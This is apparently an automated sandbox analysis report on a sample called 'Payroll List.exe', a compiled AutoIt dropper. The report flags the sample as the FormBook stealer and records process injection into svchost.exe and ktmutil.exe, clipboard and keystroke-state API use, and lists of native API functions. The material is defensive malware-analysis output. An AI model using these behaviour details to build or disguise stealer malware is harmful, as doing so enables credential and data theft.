                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 00000006.00000003.1933176968.0000000007638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ktmutil.exe, 00000006.00000002.3291580399.000000000282D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00176B0C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00176D07
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00176B0C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00162B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00162B37
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0018F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: This is a third-party compiled AutoIt script.0_2_00123D19
                Source: Payroll List.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Payroll List.exe, 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_30df85fd-6
                Source: Payroll List.exe, 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d51a3dae-a
                Source: Payroll List.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e6868272-d
                Source: Payroll List.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd607bf1-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C883 NtClose,2_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E14340 NtSetContextThread,LdrInitializeThunk,6_2_02E14340
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E14650 NtSuspendThread,LdrInitializeThunk,6_2_02E14650
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AF0 NtWriteFile,LdrInitializeThunk,6_2_02E12AF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AD0 NtReadFile,LdrInitializeThunk,6_2_02E12AD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02E12BE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02E12BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02E12BA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12B60 NtClose,LdrInitializeThunk,6_2_02E12B60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02E12EE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02E12E80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FE0 NtCreateFile,LdrInitializeThunk,6_2_02E12FE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FB0 NtResumeThread,LdrInitializeThunk,6_2_02E12FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F30 NtCreateSection,LdrInitializeThunk,6_2_02E12F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02E12CA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C60 NtCreateKey,LdrInitializeThunk,6_2_02E12C60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02E12C70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02E12DF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DD0 NtDelayExecution,LdrInitializeThunk,6_2_02E12DD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02E12D30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02E12D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E135C0 NtCreateMutant,LdrInitializeThunk,6_2_02E135C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E139B0 NtGetContextThread,LdrInitializeThunk,6_2_02E139B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12AB0 NtWaitForSingleObject,6_2_02E12AB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12B80 NtQueryInformationFile,6_2_02E12B80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12EA0 NtAdjustPrivilegesToken,6_2_02E12EA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12E30 NtWriteVirtualMemory,6_2_02E12E30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12FA0 NtQuerySection,6_2_02E12FA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F90 NtProtectVirtualMemory,6_2_02E12F90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12F60 NtCreateProcessEx,6_2_02E12F60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CF0 NtOpenProcess,6_2_02E12CF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12CC0 NtQueryVirtualMemory,6_2_02E12CC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12C00 NtQueryInformationProcess,6_2_02E12C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12DB0 NtEnumerateKey,6_2_02E12DB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E12D00 NtSetInformationFile,6_2_02E12D00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13090 NtSetValueKey,6_2_02E13090
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13010 NtOpenDirectoryObject,6_2_02E13010
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13D70 NtOpenThread,6_2_02E13D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02E13D10 NtOpenProcessToken,6_2_02E13D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_00429280 NtCreateFile,6_2_00429280
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004293F0 NtReadFile,6_2_004293F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004294F0 NtDeleteFile,6_2_004294F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_004295A0 NtClose,6_2_004295A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_00429700 NtAllocateVirtualMemory,6_2_00429700
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00166606
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0015ACC5
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001679D3
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014B0430_2_0014B043
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015410F0_2_0015410F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001402A40_2_001402A4
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015038E0_2_0015038E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0012E3B00_2_0012E3B0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015467F0_2_0015467F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001406D90_2_001406D9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018AACE0_2_0018AACE
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00154BEF0_2_00154BEF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014CCC10_2_0014CCC1
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00126F070_2_00126F07
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0012AF500_2_0012AF50
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013B11F0_2_0013B11F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001831BC0_2_001831BC
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014D1B90_2_0014D1B9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001332000_2_00133200
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014123A0_2_0014123A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015724D0_2_0015724D
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001613CA0_2_001613CA
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001293F00_2_001293F0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013F5630_2_0013F563
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001296C00_2_001296C0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016B6CC0_2_0016B6CC
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001277B00_2_001277B0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0018F7FF0_2_0018F7FF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001579C90_2_001579C9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013FA570_2_0013FA57
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00133B700_2_00133B70
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00129B600_2_00129B60
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00127D190_2_00127D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013FE6F0_2_0013FE6F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00149ED00_2_00149ED0
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00127FA30_2_00127FA3
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D584680_2_00D58468
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188F32_2_004188F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030602_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101CA2_2_004101CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040235D2_2_0040235D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023602_2_00402360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B332_2_00416B33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B952_2_00402B95
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402BA02_2_00402BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E46B2_2_0040E46B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EEA32_2_0042EEA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393ADE02_2_0393ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
